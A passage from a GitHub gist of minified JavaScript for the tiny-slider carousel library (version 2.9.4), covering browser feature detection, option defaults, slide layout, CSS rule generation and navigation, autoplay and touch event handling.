-
-
Save krautface/469fa925b494b7b436e1fd9346d36b60 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var tns = function() { | |
var t = window | |
, Ai = t.requestAnimationFrame || t.webkitRequestAnimationFrame || t.mozRequestAnimationFrame || t.msRequestAnimationFrame || function(t) { | |
return setTimeout(t, 16) | |
} | |
, e = window | |
, Ni = e.cancelAnimationFrame || e.mozCancelAnimationFrame || function(t) { | |
clearTimeout(t) | |
} | |
; | |
function Li() { | |
for (var t, e, n, i = arguments[0] || {}, a = 1, r = arguments.length; a < r; a++) | |
if (null !== (t = arguments[a])) | |
for (e in t) | |
i !== (n = t[e]) && void 0 !== n && (i[e] = n); | |
return i | |
} | |
function Bi(t) { | |
return 0 <= ["true", "false"].indexOf(t) ? JSON.parse(t) : t | |
} | |
function Si(t, e, n, i) { | |
if (i) | |
try { | |
t.setItem(e, n) | |
} catch (t) {} | |
return n | |
} | |
function Hi() { | |
var t = document | |
, e = t.body; | |
return e || ((e = t.createElement("body")).fake = !0), | |
e | |
} | |
var n = document.documentElement; | |
function Oi(t) { | |
var e = ""; | |
return t.fake && (e = n.style.overflow, | |
t.style.background = "", | |
t.style.overflow = n.style.overflow = "hidden", | |
n.appendChild(t)), | |
e | |
} | |
function Di(t, e) { | |
t.fake && (t.remove(), | |
n.style.overflow = e, | |
n.offsetHeight) | |
} | |
function ki(t, e, n, i) { | |
"insertRule"in t ? t.insertRule(e + "{" + n + "}", i) : t.addRule(e, n, i) | |
} | |
function Ri(t) { | |
return ("insertRule"in t ? t.cssRules : t.rules).length | |
} | |
function Ii(t, e, n) { | |
for (var i = 0, a = t.length; i < a; i++) | |
e.call(n, t[i], i) | |
} | |
var i = "classList"in document.createElement("_") | |
, Pi = i ? function(t, e) { | |
return t.classList.contains(e) | |
} | |
: function(t, e) { | |
return 0 <= t.className.indexOf(e) | |
} | |
, zi = i ? function(t, e) { | |
Pi(t, e) || t.classList.add(e) | |
} | |
: function(t, e) { | |
Pi(t, e) || (t.className += " " + e) | |
} | |
, Wi = i ? function(t, e) { | |
Pi(t, e) && t.classList.remove(e) | |
} | |
: function(t, e) { | |
Pi(t, e) && (t.className = t.className.replace(e, "")) | |
} | |
; | |
function qi(t, e) { | |
return t.hasAttribute(e) | |
} | |
function Fi(t, e) { | |
return t.getAttribute(e) | |
} | |
function r(t) { | |
return void 0 !== t.item | |
} | |
function ji(t, e) { | |
if (t = r(t) || t instanceof Array ? t : [t], | |
"[object Object]" === Object.prototype.toString.call(e)) | |
for (var n = t.length; n--; ) | |
for (var i in e) | |
t[n].setAttribute(i, e[i]) | |
} | |
function Vi(t, e) { | |
t = r(t) || t instanceof Array ? t : [t]; | |
for (var n = (e = e instanceof Array ? e : [e]).length, i = t.length; i--; ) | |
for (var a = n; a--; ) | |
t[i].removeAttribute(e[a]) | |
} | |
function Gi(t) { | |
for (var e = [], n = 0, i = t.length; n < i; n++) | |
e.push(t[n]); | |
return e | |
} | |
function Qi(t, e) { | |
"none" !== t.style.display && (t.style.display = "none") | |
} | |
function Xi(t, e) { | |
"none" === t.style.display && (t.style.display = "") | |
} | |
function Yi(t) { | |
return "none" !== window.getComputedStyle(t).display | |
} | |
function Ki(e) { | |
if ("string" == typeof e) { | |
var n = [e] | |
, i = e.charAt(0).toUpperCase() + e.substr(1); | |
["Webkit", "Moz", "ms", "O"].forEach(function(t) { | |
"ms" === t && "transform" !== e || n.push(t + i) | |
}), | |
e = n | |
} | |
for (var t = document.createElement("fakeelement"), a = (e.length, | |
0); a < e.length; a++) { | |
var r = e[a]; | |
if (void 0 !== t.style[r]) | |
return r | |
} | |
return !1 | |
} | |
function Ji(t, e) { | |
var n = !1; | |
return /^Webkit/.test(t) ? n = "webkit" + e + "End" : /^O/.test(t) ? n = "o" + e + "End" : t && (n = e.toLowerCase() + "end"), | |
n | |
} | |
var a = !1; | |
try { | |
var o = Object.defineProperty({}, "passive", { | |
get: function() { | |
a = !0 | |
} | |
}); | |
window.addEventListener("test", null, o) | |
} catch (t) {} | |
var u = !!a && { | |
passive: !0 | |
}; | |
function Ui(t, e, n) { | |
for (var i in e) { | |
var a = 0 <= ["touchstart", "touchmove"].indexOf(i) && !n && u; | |
t.addEventListener(i, e[i], a) | |
} | |
} | |
function _i(t, e) { | |
for (var n in e) { | |
var i = 0 <= ["touchstart", "touchmove"].indexOf(n) && u; | |
t.removeEventListener(n, e[n], i) | |
} | |
} | |
function Zi() { | |
return { | |
topics: {}, | |
on: function(t, e) { | |
this.topics[t] = this.topics[t] || [], | |
this.topics[t].push(e) | |
}, | |
off: function(t, e) { | |
if (this.topics[t]) | |
for (var n = 0; n < this.topics[t].length; n++) | |
if (this.topics[t][n] === e) { | |
this.topics[t].splice(n, 1); | |
break | |
} | |
}, | |
emit: function(e, n) { | |
n.type = e, | |
this.topics[e] && this.topics[e].forEach(function(t) { | |
t(n, e) | |
}) | |
} | |
} | |
} | |
Object.keys || (Object.keys = function(t) { | |
var e = []; | |
for (var n in t) | |
Object.prototype.hasOwnProperty.call(t, n) && e.push(n); | |
return e | |
} | |
), | |
"remove"in Element.prototype || (Element.prototype.remove = function() { | |
this.parentNode && this.parentNode.removeChild(this) | |
} | |
); | |
var $i = function(H) { | |
H = Li({ | |
container: ".slider", | |
mode: "carousel", | |
axis: "horizontal", | |
items: 1, | |
gutter: 0, | |
edgePadding: 0, | |
fixedWidth: !1, | |
autoWidth: !1, | |
viewportMax: !1, | |
slideBy: 1, | |
center: !1, | |
controls: !0, | |
controlsPosition: "top", | |
controlsText: ["prev", "next"], | |
controlsContainer: !1, | |
prevButton: !1, | |
nextButton: !1, | |
nav: !0, | |
navPosition: "top", | |
navContainer: !1, | |
navAsThumbnails: !1, | |
arrowKeys: !1, | |
speed: 300, | |
autoplay: !1, | |
autoplayPosition: "top", | |
autoplayTimeout: 5e3, | |
autoplayDirection: "forward", | |
autoplayText: ["start", "stop"], | |
autoplayHoverPause: !1, | |
autoplayButton: !1, | |
autoplayButtonOutput: !0, | |
autoplayResetOnVisibility: !0, | |
animateIn: "tns-fadeIn", | |
animateOut: "tns-fadeOut", | |
animateNormal: "tns-normal", | |
animateDelay: !1, | |
loop: !0, | |
rewind: !1, | |
autoHeight: !1, | |
responsive: !1, | |
lazyload: !1, | |
lazyloadSelector: ".tns-lazy-img", | |
touch: !0, | |
mouseDrag: !1, | |
swipeAngle: 15, | |
nested: !1, | |
preventActionWhenRunning: !1, | |
preventScrollOnTouch: !1, | |
freezable: !0, | |
onInit: !1, | |
useLocalStorage: !0, | |
nonce: !1 | |
}, H || {}); | |
var O = document | |
, m = window | |
, a = { | |
ENTER: 13, | |
SPACE: 32, | |
LEFT: 37, | |
RIGHT: 39 | |
} | |
, e = {} | |
, n = H.useLocalStorage; | |
if (n) { | |
var t = navigator.userAgent | |
, i = new Date; | |
try { | |
(e = m.localStorage) ? (e.setItem(i, i), | |
n = e.getItem(i) == i, | |
e.removeItem(i)) : n = !1, | |
n || (e = {}) | |
} catch (t) { | |
n = !1 | |
} | |
n && (e.tnsApp && e.tnsApp !== t && ["tC", "tPL", "tMQ", "tTf", "t3D", "tTDu", "tTDe", "tADu", "tADe", "tTE", "tAE"].forEach(function(t) { | |
e.removeItem(t) | |
}), | |
localStorage.tnsApp = t) | |
} | |
var y = e.tC ? Bi(e.tC) : Si(e, "tC", function() { | |
var t = document | |
, e = Hi() | |
, n = Oi(e) | |
, i = t.createElement("div") | |
, a = !1; | |
e.appendChild(i); | |
try { | |
for (var r, o = "(10px * 10)", u = ["calc" + o, "-moz-calc" + o, "-webkit-calc" + o], l = 0; l < 3; l++) | |
if (r = u[l], | |
i.style.width = r, | |
100 === i.offsetWidth) { | |
a = r.replace(o, ""); | |
break | |
} | |
} catch (t) {} | |
return e.fake ? Di(e, n) : i.remove(), | |
a | |
}(), n) | |
, g = e.tPL ? Bi(e.tPL) : Si(e, "tPL", function() { | |
var t, e = document, n = Hi(), i = Oi(n), a = e.createElement("div"), r = e.createElement("div"), o = ""; | |
a.className = "tns-t-subp2", | |
r.className = "tns-t-ct"; | |
for (var u = 0; u < 70; u++) | |
o += "<div></div>"; | |
return r.innerHTML = o, | |
a.appendChild(r), | |
n.appendChild(a), | |
t = Math.abs(a.getBoundingClientRect().left - r.children[67].getBoundingClientRect().left) < 2, | |
n.fake ? Di(n, i) : a.remove(), | |
t | |
}(), n) | |
, D = e.tMQ ? Bi(e.tMQ) : Si(e, "tMQ", function() { | |
if (window.matchMedia || window.msMatchMedia) | |
return !0; | |
var t, e = document, n = Hi(), i = Oi(n), a = e.createElement("div"), r = e.createElement("style"), o = "@media all and (min-width:1px){.tns-mq-test{position:absolute}}"; | |
return r.type = "text/css", | |
a.className = "tns-mq-test", | |
n.appendChild(r), | |
n.appendChild(a), | |
r.styleSheet ? r.styleSheet.cssText = o : r.appendChild(e.createTextNode(o)), | |
t = window.getComputedStyle ? window.getComputedStyle(a).position : a.currentStyle.position, | |
n.fake ? Di(n, i) : a.remove(), | |
"absolute" === t | |
}(), n) | |
, r = e.tTf ? Bi(e.tTf) : Si(e, "tTf", Ki("transform"), n) | |
, o = e.t3D ? Bi(e.t3D) : Si(e, "t3D", function(t) { | |
if (!t) | |
return !1; | |
if (!window.getComputedStyle) | |
return !1; | |
var e, n = document, i = Hi(), a = Oi(i), r = n.createElement("p"), o = 9 < t.length ? "-" + t.slice(0, -9).toLowerCase() + "-" : ""; | |
return o += "transform", | |
i.insertBefore(r, null), | |
r.style[t] = "translate3d(1px,1px,1px)", | |
e = window.getComputedStyle(r).getPropertyValue(o), | |
i.fake ? Di(i, a) : r.remove(), | |
void 0 !== e && 0 < e.length && "none" !== e | |
}(r), n) | |
, x = e.tTDu ? Bi(e.tTDu) : Si(e, "tTDu", Ki("transitionDuration"), n) | |
, u = e.tTDe ? Bi(e.tTDe) : Si(e, "tTDe", Ki("transitionDelay"), n) | |
, b = e.tADu ? Bi(e.tADu) : Si(e, "tADu", Ki("animationDuration"), n) | |
, l = e.tADe ? Bi(e.tADe) : Si(e, "tADe", Ki("animationDelay"), n) | |
, s = e.tTE ? Bi(e.tTE) : Si(e, "tTE", Ji(x, "Transition"), n) | |
, c = e.tAE ? Bi(e.tAE) : Si(e, "tAE", Ji(b, "Animation"), n) | |
, f = m.console && "function" == typeof m.console.warn | |
, d = ["container", "controlsContainer", "prevButton", "nextButton", "navContainer", "autoplayButton"] | |
, v = {}; | |
if (d.forEach(function(t) { | |
if ("string" == typeof H[t]) { | |
var e = H[t] | |
, n = O.querySelector(e); | |
if (v[t] = e, | |
!n || !n.nodeName) | |
return void (f && console.warn("Can't find", H[t])); | |
H[t] = n | |
} | |
}), | |
!(H.container.children.length < 1)) { | |
var k = H.responsive | |
, R = H.nested | |
, I = "carousel" === H.mode; | |
if (k) { | |
0 in k && (H = Li(H, k[0]), | |
delete k[0]); | |
var p = {}; | |
for (var h in k) { | |
var w = k[h]; | |
w = "number" == typeof w ? { | |
items: w | |
} : w, | |
p[h] = w | |
} | |
k = p, | |
p = null | |
} | |
if (I || function t(e) { | |
for (var n in e) | |
I || ("slideBy" === n && (e[n] = "page"), | |
"edgePadding" === n && (e[n] = !1), | |
"autoHeight" === n && (e[n] = !1)), | |
"responsive" === n && t(e[n]) | |
}(H), | |
!I) { | |
H.axis = "horizontal", | |
H.slideBy = "page", | |
H.edgePadding = !1; | |
var P = H.animateIn | |
, z = H.animateOut | |
, C = H.animateDelay | |
, W = H.animateNormal | |
} | |
var M, q, F = "horizontal" === H.axis, T = O.createElement("div"), j = O.createElement("div"), V = H.container, E = V.parentNode, A = V.outerHTML, G = V.children, Q = G.length, X = rn(), Y = !1; | |
k && En(), | |
I && (V.className += " tns-vpfix"); | |
var N, L, B, S, K, J, U, _, Z, $ = H.autoWidth, tt = sn("fixedWidth"), et = sn("edgePadding"), nt = sn("gutter"), it = un(), at = sn("center"), rt = $ ? 1 : Math.floor(sn("items")), ot = sn("slideBy"), ut = H.viewportMax || H.fixedWidthViewportWidth, lt = sn("arrowKeys"), st = sn("speed"), ct = H.rewind, ft = !ct && H.loop, dt = sn("autoHeight"), vt = sn("controls"), pt = sn("controlsText"), ht = sn("nav"), mt = sn("touch"), yt = sn("mouseDrag"), gt = sn("autoplay"), xt = sn("autoplayTimeout"), bt = sn("autoplayText"), wt = sn("autoplayHoverPause"), Ct = sn("autoplayResetOnVisibility"), Mt = (U = null, | |
_ = sn("nonce"), | |
Z = document.createElement("style"), | |
U && Z.setAttribute("media", U), | |
_ && Z.setAttribute("nonce", _), | |
document.querySelector("head").appendChild(Z), | |
Z.sheet ? Z.sheet : Z.styleSheet), Tt = H.lazyload, Et = H.lazyloadSelector, At = [], Nt = ft ? (K = function() { | |
{ | |
if ($ || tt && !ut) | |
return Q - 1; | |
var t = tt ? "fixedWidth" : "items" | |
, e = []; | |
if ((tt || H[t] < Q) && e.push(H[t]), | |
k) | |
for (var n in k) { | |
var i = k[n][t]; | |
i && (tt || i < Q) && e.push(i) | |
} | |
return e.length || e.push(0), | |
Math.ceil(tt ? ut / Math.min.apply(null, e) : Math.max.apply(null, e)) | |
} | |
}(), | |
J = I ? Math.ceil((5 * K - Q) / 2) : 4 * K - Q, | |
J = Math.max(K, J), | |
ln("edgePadding") ? J + 1 : J) : 0, Lt = I ? Q + 2 * Nt : Q + Nt, Bt = !(!tt && !$ || ft), St = tt ? _n() : null, Ht = !I || !ft, Ot = F ? "left" : "top", Dt = "", kt = "", Rt = tt ? function() { | |
return at && !ft ? Q - 1 : Math.ceil(-St / (tt + nt)) | |
} | |
: $ ? function() { | |
for (var t = 0; t < Lt; t++) | |
if (N[t] >= -St) | |
return t | |
} | |
: function() { | |
return at && I && !ft ? Q - 1 : ft || I ? Math.max(0, Lt - Math.ceil(rt)) : Lt - 1 | |
} | |
, It = en(sn("startIndex")), Pt = It, zt = (tn(), | |
0), Wt = $ ? null : Rt(), qt = H.preventActionWhenRunning, Ft = H.swipeAngle, jt = !Ft || "?", Vt = !1, Gt = H.onInit, Qt = new Zi, Xt = " tns-slider tns-" + H.mode, Yt = V.id || (S = window.tnsId, | |
window.tnsId = S ? S + 1 : 1, | |
"tns" + window.tnsId), Kt = sn("disable"), Jt = !1, Ut = H.freezable, _t = !(!Ut || $) && Tn(), Zt = !1, $t = { | |
click: oi, | |
keydown: function(t) { | |
t = pi(t); | |
var e = [a.LEFT, a.RIGHT].indexOf(t.keyCode); | |
0 <= e && (0 === e ? we.disabled || oi(t, -1) : Ce.disabled || oi(t, 1)) | |
} | |
}, te = { | |
click: function(t) { | |
if (Vt) { | |
if (qt) | |
return; | |
ai() | |
} | |
var e = hi(t = pi(t)); | |
for (; e !== Ae && !qi(e, "data-nav"); ) | |
e = e.parentNode; | |
if (qi(e, "data-nav")) { | |
var n = Se = Number(Fi(e, "data-nav")) | |
, i = tt || $ ? n * Q / Le : n * rt | |
, a = le ? n : Math.min(Math.ceil(i), Q - 1); | |
ri(a, t), | |
He === n && (Pe && fi(), | |
Se = -1) | |
} | |
}, | |
keydown: function(t) { | |
t = pi(t); | |
var e = O.activeElement; | |
if (!qi(e, "data-nav")) | |
return; | |
var n = [a.LEFT, a.RIGHT, a.ENTER, a.SPACE].indexOf(t.keyCode) | |
, i = Number(Fi(e, "data-nav")); | |
0 <= n && (0 === n ? 0 < i && vi(Ee[i - 1]) : 1 === n ? i < Le - 1 && vi(Ee[i + 1]) : ri(Se = i, t)) | |
} | |
}, ee = { | |
mouseover: function() { | |
Pe && (li(), | |
ze = !0) | |
}, | |
mouseout: function() { | |
ze && (ui(), | |
ze = !1) | |
} | |
}, ne = { | |
visibilitychange: function() { | |
O.hidden ? Pe && (li(), | |
qe = !0) : qe && (ui(), | |
qe = !1) | |
} | |
}, ie = { | |
keydown: function(t) { | |
t = pi(t); | |
var e = [a.LEFT, a.RIGHT].indexOf(t.keyCode); | |
0 <= e && oi(t, 0 === e ? -1 : 1) | |
} | |
}, ae = { | |
touchstart: xi, | |
touchmove: bi, | |
touchend: wi, | |
touchcancel: wi | |
}, re = { | |
mousedown: xi, | |
mousemove: bi, | |
mouseup: wi, | |
mouseleave: wi | |
}, oe = ln("controls"), ue = ln("nav"), le = !!$ || H.navAsThumbnails, se = ln("autoplay"), ce = ln("touch"), fe = ln("mouseDrag"), de = "tns-slide-active", ve = "tns-slide-cloned", pe = "tns-complete", he = { | |
load: function(t) { | |
kn(hi(t)) | |
}, | |
error: function(t) { | |
e = hi(t), | |
zi(e, "failed"), | |
Rn(e); | |
var e | |
} | |
}, me = "force" === H.preventScrollOnTouch; | |
if (oe) | |
var ye, ge, xe = H.controlsContainer, be = H.controlsContainer ? H.controlsContainer.outerHTML : "", we = H.prevButton, Ce = H.nextButton, Me = H.prevButton ? H.prevButton.outerHTML : "", Te = H.nextButton ? H.nextButton.outerHTML : ""; | |
if (ue) | |
var Ee, Ae = H.navContainer, Ne = H.navContainer ? H.navContainer.outerHTML : "", Le = $ ? Q : Mi(), Be = 0, Se = -1, He = an(), Oe = He, De = "tns-nav-active", ke = "Carousel Page ", Re = " (Current Slide)"; | |
if (se) | |
var Ie, Pe, ze, We, qe, Fe = "forward" === H.autoplayDirection ? 1 : -1, je = H.autoplayButton, Ve = H.autoplayButton ? H.autoplayButton.outerHTML : "", Ge = ["<span class='tns-visually-hidden'>", " animation</span>"]; | |
if (ce || fe) | |
var Qe, Xe, Ye = {}, Ke = {}, Je = !1, Ue = F ? function(t, e) { | |
return t.x - e.x | |
} | |
: function(t, e) { | |
return t.y - e.y | |
} | |
; | |
$ || $e(Kt || _t), | |
r && (Ot = r, | |
Dt = "translate", | |
o ? (Dt += F ? "3d(" : "3d(0px, ", | |
kt = F ? ", 0px, 0px)" : ", 0px)") : (Dt += F ? "X(" : "Y(", | |
kt = ")")), | |
I && (V.className = V.className.replace("tns-vpfix", "")), | |
function() { | |
ln("gutter"); | |
T.className = "tns-outer", | |
j.className = "tns-inner", | |
T.id = Yt + "-ow", | |
j.id = Yt + "-iw", | |
"" === V.id && (V.id = Yt); | |
Xt += g || $ ? " tns-subpixel" : " tns-no-subpixel", | |
Xt += y ? " tns-calc" : " tns-no-calc", | |
$ && (Xt += " tns-autowidth"); | |
Xt += " tns-" + H.axis, | |
V.className += Xt, | |
I ? ((M = O.createElement("div")).id = Yt + "-mw", | |
M.className = "tns-ovh", | |
T.appendChild(M), | |
M.appendChild(j)) : T.appendChild(j); | |
if (dt) { | |
var t = M || j; | |
t.className += " tns-ah" | |
} | |
if (E.insertBefore(T, V), | |
j.appendChild(V), | |
Ii(G, function(t, e) { | |
zi(t, "tns-item"), | |
t.id || (t.id = Yt + "-item" + e), | |
!I && W && zi(t, W), | |
ji(t, { | |
"aria-hidden": "true", | |
tabindex: "-1" | |
}) | |
}), | |
Nt) { | |
for (var e = O.createDocumentFragment(), n = O.createDocumentFragment(), i = Nt; i--; ) { | |
var a = i % Q | |
, r = G[a].cloneNode(!0); | |
if (zi(r, ve), | |
Vi(r, "id"), | |
n.insertBefore(r, n.firstChild), | |
I) { | |
var o = G[Q - 1 - a].cloneNode(!0); | |
zi(o, ve), | |
Vi(o, "id"), | |
e.appendChild(o) | |
} | |
} | |
V.insertBefore(e, V.firstChild), | |
V.appendChild(n), | |
G = V.children | |
} | |
}(), | |
function() { | |
if (!I) | |
for (var t = It, e = It + Math.min(Q, rt); t < e; t++) { | |
var n = G[t]; | |
n.style.left = 100 * (t - It) / rt + "%", | |
zi(n, P), | |
Wi(n, W) | |
} | |
F && (g || $ ? (ki(Mt, "#" + Yt + " > .tns-item", "font-size:" + m.getComputedStyle(G[0]).fontSize + ";", Ri(Mt)), | |
ki(Mt, "#" + Yt, "font-size:0;", Ri(Mt))) : I && Ii(G, function(t, e) { | |
var n; | |
t.style.marginLeft = (n = e, | |
y ? y + "(" + 100 * n + "% / " + Lt + ")" : 100 * n / Lt + "%") | |
})); | |
if (D) { | |
if (x) { | |
var i = M && H.autoHeight ? hn(H.speed) : ""; | |
ki(Mt, "#" + Yt + "-mw", i, Ri(Mt)) | |
} | |
i = cn(H.edgePadding, H.gutter, H.fixedWidth, H.speed, H.autoHeight), | |
ki(Mt, "#" + Yt + "-iw", i, Ri(Mt)), | |
I && (i = F && !$ ? "width:" + fn(H.fixedWidth, H.gutter, H.items) + ";" : "", | |
x && (i += hn(st)), | |
ki(Mt, "#" + Yt, i, Ri(Mt))), | |
i = F && !$ ? dn(H.fixedWidth, H.gutter, H.items) : "", | |
H.gutter && (i += vn(H.gutter)), | |
I || (x && (i += hn(st)), | |
b && (i += mn(st))), | |
i && ki(Mt, "#" + Yt + " > .tns-item", i, Ri(Mt)) | |
} else { | |
I && dt && (M.style[x] = st / 1e3 + "s"), | |
j.style.cssText = cn(et, nt, tt, dt), | |
I && F && !$ && (V.style.width = fn(tt, nt, rt)); | |
var i = F && !$ ? dn(tt, nt, rt) : ""; | |
nt && (i += vn(nt)), | |
i && ki(Mt, "#" + Yt + " > .tns-item", i, Ri(Mt)) | |
} | |
if (k && D) | |
for (var a in k) { | |
a = parseInt(a); | |
var r = k[a] | |
, i = "" | |
, o = "" | |
, u = "" | |
, l = "" | |
, s = "" | |
, c = $ ? null : sn("items", a) | |
, f = sn("fixedWidth", a) | |
, d = sn("speed", a) | |
, v = sn("edgePadding", a) | |
, p = sn("autoHeight", a) | |
, h = sn("gutter", a); | |
x && M && sn("autoHeight", a) && "speed"in r && (o = "#" + Yt + "-mw{" + hn(d) + "}"), | |
("edgePadding"in r || "gutter"in r) && (u = "#" + Yt + "-iw{" + cn(v, h, f, d, p) + "}"), | |
I && F && !$ && ("fixedWidth"in r || "items"in r || tt && "gutter"in r) && (l = "width:" + fn(f, h, c) + ";"), | |
x && "speed"in r && (l += hn(d)), | |
l && (l = "#" + Yt + "{" + l + "}"), | |
("fixedWidth"in r || tt && "gutter"in r || !I && "items"in r) && (s += dn(f, h, c)), | |
"gutter"in r && (s += vn(h)), | |
!I && "speed"in r && (x && (s += hn(d)), | |
b && (s += mn(d))), | |
s && (s = "#" + Yt + " > .tns-item{" + s + "}"), | |
(i = o + u + l + s) && Mt.insertRule("@media (min-width: " + a / 16 + "em) {" + i + "}", Mt.cssRules.length) | |
} | |
}(), | |
yn(); | |
var _e = ft ? I ? function() { | |
var t = zt | |
, e = Wt; | |
t += ot, | |
e -= ot, | |
et ? (t += 1, | |
e -= 1) : tt && (it + nt) % (tt + nt) && (e -= 1), | |
Nt && (e < It ? It -= Q : It < t && (It += Q)) | |
} | |
: function() { | |
if (Wt < It) | |
for (; zt + Q <= It; ) | |
It -= Q; | |
else if (It < zt) | |
for (; It <= Wt - Q; ) | |
It += Q | |
} | |
: function() { | |
It = Math.max(zt, Math.min(Wt, It)) | |
} | |
, Ze = I ? function() { | |
var e, n, i, a, t, r, o, u, l, s, c; | |
Jn(V, ""), | |
x || !st ? (ti(), | |
st && Yi(V) || ai()) : (e = V, | |
n = Ot, | |
i = Dt, | |
a = kt, | |
t = Zn(), | |
r = st, | |
o = ai, | |
u = Math.min(r, 10), | |
l = 0 <= t.indexOf("%") ? "%" : "px", | |
t = t.replace(l, ""), | |
s = Number(e.style[n].replace(i, "").replace(a, "").replace(l, "")), | |
c = (t - s) / r * u, | |
setTimeout(function t() { | |
r -= u, | |
s += c, | |
e.style[n] = i + s + l + a, | |
0 < r ? setTimeout(t, u) : o() | |
}, u)), | |
F || Ci() | |
} | |
: function() { | |
At = []; | |
var t = {}; | |
t[s] = t[c] = ai, | |
_i(G[Pt], t), | |
Ui(G[It], t), | |
ei(Pt, P, z, !0), | |
ei(It, W, P), | |
s && c && st && Yi(V) || ai() | |
} | |
; | |
return { | |
version: "2.9.4", | |
getInfo: Ei, | |
events: Qt, | |
goTo: ri, | |
play: function() { | |
gt && !Pe && (ci(), | |
We = !1) | |
}, | |
pause: function() { | |
Pe && (fi(), | |
We = !0) | |
}, | |
isOn: Y, | |
updateSliderHeight: Fn, | |
refresh: yn, | |
destroy: function() { | |
if (Mt.disabled = !0, | |
Mt.ownerNode && Mt.ownerNode.remove(), | |
_i(m, { | |
resize: Cn | |
}), | |
lt && _i(O, ie), | |
xe && _i(xe, $t), | |
Ae && _i(Ae, te), | |
_i(V, ee), | |
_i(V, ne), | |
je && _i(je, { | |
click: di | |
}), | |
gt && clearInterval(Ie), | |
I && s) { | |
var t = {}; | |
t[s] = ai, | |
_i(V, t) | |
} | |
mt && _i(V, ae), | |
yt && _i(V, re); | |
var r = [A, be, Me, Te, Ne, Ve]; | |
for (var e in d.forEach(function(t, e) { | |
var n = "container" === t ? T : H[t]; | |
if ("object" == typeof n && n) { | |
var i = !!n.previousElementSibling && n.previousElementSibling | |
, a = n.parentNode; | |
n.outerHTML = r[e], | |
H[t] = i ? i.nextElementSibling : a.firstElementChild | |
} | |
}), | |
d = P = z = C = W = F = T = j = V = E = A = G = Q = q = X = $ = tt = et = nt = it = rt = ot = ut = lt = st = ct = ft = dt = Mt = Tt = N = At = Nt = Lt = Bt = St = Ht = Ot = Dt = kt = Rt = It = Pt = zt = Wt = Ft = jt = Vt = Gt = Qt = Xt = Yt = Kt = Jt = Ut = _t = Zt = $t = te = ee = ne = ie = ae = re = oe = ue = le = se = ce = fe = de = pe = he = L = vt = pt = xe = be = we = Ce = ye = ge = ht = Ae = Ne = Ee = Le = Be = Se = He = Oe = De = ke = Re = gt = xt = Fe = bt = wt = je = Ve = Ct = Ge = Ie = Pe = ze = We = qe = Ye = Ke = Qe = Je = Xe = Ue = mt = yt = null, | |
this) | |
"rebuild" !== e && (this[e] = null); | |
Y = !1 | |
}, | |
rebuild: function() { | |
return $i(Li(H, v)) | |
} | |
} | |
} | |
function $e(t) { | |
t && (vt = ht = mt = yt = lt = gt = wt = Ct = !1) | |
} | |
function tn() { | |
for (var t = I ? It - Nt : It; t < 0; ) | |
t += Q; | |
return t % Q + 1 | |
} | |
function en(t) { | |
return t = t ? Math.max(0, Math.min(ft ? Q - 1 : Q - rt, t)) : 0, | |
I ? t + Nt : t | |
} | |
function nn(t) { | |
for (null == t && (t = It), | |
I && (t -= Nt); t < 0; ) | |
t += Q; | |
return Math.floor(t % Q) | |
} | |
function an() { | |
var t, e = nn(); | |
return t = le ? e : tt || $ ? Math.ceil((e + 1) * Le / Q - 1) : Math.floor(e / rt), | |
!ft && I && It === Wt && (t = Le - 1), | |
t | |
} | |
function rn() { | |
return m.innerWidth || O.documentElement.clientWidth || O.body.clientWidth | |
} | |
function on(t) { | |
return "top" === t ? "afterbegin" : "beforeend" | |
} | |
function un() { | |
var t = et ? 2 * et - nt : 0; | |
return function t(e) { | |
if (null != e) { | |
var n, i, a = O.createElement("div"); | |
return e.appendChild(a), | |
i = (n = a.getBoundingClientRect()).right - n.left, | |
a.remove(), | |
i || t(e.parentNode) | |
} | |
}(E) - t | |
} | |
function ln(t) { | |
if (H[t]) | |
return !0; | |
if (k) | |
for (var e in k) | |
if (k[e][t]) | |
return !0; | |
return !1 | |
} | |
function sn(t, e) { | |
if (null == e && (e = X), | |
"items" === t && tt) | |
return Math.floor((it + nt) / (tt + nt)) || 1; | |
var n = H[t]; | |
if (k) | |
for (var i in k) | |
e >= parseInt(i) && t in k[i] && (n = k[i][t]); | |
return "slideBy" === t && "page" === n && (n = sn("items")), | |
I || "slideBy" !== t && "items" !== t || (n = Math.floor(n)), | |
n | |
} | |
function cn(t, e, n, i, a) { | |
var r = ""; | |
if (void 0 !== t) { | |
var o = t; | |
e && (o -= e), | |
r = F ? "margin: 0 " + o + "px 0 " + t + "px;" : "margin: " + t + "px 0 " + o + "px 0;" | |
} else if (e && !n) { | |
var u = "-" + e + "px"; | |
r = "margin: 0 " + (F ? u + " 0 0" : "0 " + u + " 0") + ";" | |
} | |
return !I && a && x && i && (r += hn(i)), | |
r | |
} | |
function fn(t, e, n) { | |
return t ? (t + e) * Lt + "px" : y ? y + "(" + 100 * Lt + "% / " + n + ")" : 100 * Lt / n + "%" | |
} | |
function dn(t, e, n) { | |
var i; | |
if (t) | |
i = t + e + "px"; | |
else { | |
I || (n = Math.floor(n)); | |
var a = I ? Lt : n; | |
i = y ? y + "(100% / " + a + ")" : 100 / a + "%" | |
} | |
return i = "width:" + i, | |
"inner" !== R ? i + ";" : i + " !important;" | |
} | |
function vn(t) { | |
var e = ""; | |
!1 !== t && (e = (F ? "padding-" : "margin-") + (F ? "right" : "bottom") + ": " + t + "px;"); | |
return e | |
} | |
function pn(t, e) { | |
var n = t.substring(0, t.length - e).toLowerCase(); | |
return n && (n = "-" + n + "-"), | |
n | |
} | |
function hn(t) { | |
return pn(x, 18) + "transition-duration:" + t / 1e3 + "s;" | |
} | |
function mn(t) { | |
return pn(b, 17) + "animation-duration:" + t / 1e3 + "s;" | |
} | |
function yn() { | |
if (ln("autoHeight") || $ || !F) { | |
var t = V.querySelectorAll("img"); | |
Ii(t, function(t) { | |
var e = t.src; | |
Tt || (e && e.indexOf("data:image") < 0 ? (t.src = "", | |
Ui(t, he), | |
zi(t, "loading"), | |
t.src = e) : kn(t)) | |
}), | |
Ai(function() { | |
zn(Gi(t), function() { | |
L = !0 | |
}) | |
}), | |
ln("autoHeight") && (t = In(It, Math.min(It + rt - 1, Lt - 1))), | |
Tt ? gn() : Ai(function() { | |
zn(Gi(t), gn) | |
}) | |
} else | |
I && $n(), | |
bn(), | |
wn() | |
} | |
function gn() { | |
if ($ && 1 < Q) { | |
var i = ft ? It : Q - 1; | |
!function t() { | |
var e = G[i].getBoundingClientRect().left | |
, n = G[i - 1].getBoundingClientRect().right; | |
Math.abs(e - n) <= 1 ? xn() : setTimeout(function() { | |
t() | |
}, 16) | |
